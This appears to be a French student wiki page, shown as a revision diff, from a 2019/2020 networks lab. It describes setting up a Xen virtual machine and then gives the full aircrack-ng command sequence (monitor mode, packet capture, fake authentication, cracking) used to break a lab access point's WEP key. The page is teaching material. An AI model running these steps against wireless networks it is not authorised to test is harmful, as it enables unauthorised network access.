TP sysres IMA5sc 2019/2020 G3 : Différence entre versions
(→Machine virtuelle) |
|||
Ligne 6 : | Ligne 6 : | ||
==Machine virtuelle== | ==Machine virtuelle== | ||
− | La machine virtuelle sera sur installée sur Cordouan. On | + | La machine virtuelle sera sur installée sur Cordouan. On s'y connecte donc en ssh : |
$ ssh root@cordouan.insecserv.deule.net | $ ssh root@cordouan.insecserv.deule.net | ||
Ligne 14 : | Ligne 14 : | ||
On peut alors observer le mot de passe dans le fichier suivant : | On peut alors observer le mot de passe dans le fichier suivant : | ||
$ tail /var/log/xen-tools/herpesgenital.log | $ tail /var/log/xen-tools/herpesgenital.log | ||
− | |||
==Cassage de clé WEP== | ==Cassage de clé WEP== |
Version du 25 novembre 2019 à 15:21
Mise en place
Suite au choix du thême, nous avons choisi comme nom de domaine herpesgenital
Machine virtuelle
La machine virtuelle sera sur installée sur Cordouan. On s'y connecte donc en ssh :
$ ssh root@cordouan.insecserv.deule.net
On peut ensuite créer la machine virtuelle Xen : (On n'oublie pas de fixer les paramètres de proxy)
$ xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --dist=buster --force
On peut alors observer le mot de passe dans le fichier suivant :
$ tail /var/log/xen-tools/herpesgenital.log
Cassage de clé WEP
On utilise pour casser la clé WEP un dongle wifi "Wi-Pi". Après avoir connecté le dongle on affiche la liste des interfaces wifi via la commande
$ iwconfig
On observe alors le nom de de l'interface associée au dongle : wlx40a5ef0590b2 renommée lors de la commande en wlan0mon
On commence par passer l'interface en mode moniteur :
$ airmon-ng start wlan0mon
On peut alors visualiser les point d'accès WEP disponibles :
$ airodump-ng --encrypt wep wlan0mon
On choisit de travailler avec cracotte04 dont on va essayer de casser la clé WEP. Grâce à la commande précédente on a pu récupérer son BSSID et son Channel. On capture les paquets sur l'interface de craquotte04 via la commande :
$ airodump-ng --channel 9 --bssid 04:DA:D2:9C:50:53 -w ./path_to_folder/cracotte04 wlan0mon
On lance alors en simultané sur un autre terminal des simulations de connexions au point d'accès. La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.
$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:53 wlan0mon
Une fois avoir capturé un grand nombre de paquets (au moins 20 000), on peut alors lancer le cassage :
$ aircrack-ng ./path_to_folder/cracotte04.cap